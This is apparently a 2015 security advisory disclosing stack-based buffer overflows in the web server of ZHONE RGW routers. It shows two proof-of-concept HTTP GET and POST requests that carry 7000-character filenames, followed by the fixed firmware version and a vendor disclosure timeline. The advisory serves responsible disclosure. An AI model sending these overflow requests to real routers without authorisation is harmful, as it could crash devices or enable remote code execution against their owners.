VP2015-003 ZHONE Router Multiple Remote Code Execution Vulnerabilities

ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to the use of unsafe string functions without sufficient input validation in the httpd binary. Two exploitable conditions were discovered when requesting a large (7000) character filename ending in .cgi, .tst, .html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage Point has developed working code execution exploits for these issues.

1. Stack Overflow via HTTP GET Request

GET /.cmd?AAAA?..AAAA<7000 Characters> HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnvlanadd.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive

2. Stack Overflow via HTTP POST Request

POST /.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438

AAAA?..AAAA<7000 Characters>

Fix Information

Upgrade to version S3.1.241

Timeline:

2015/04: Issues reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Requested Update
2015/10: Confirm that all issues has been fixed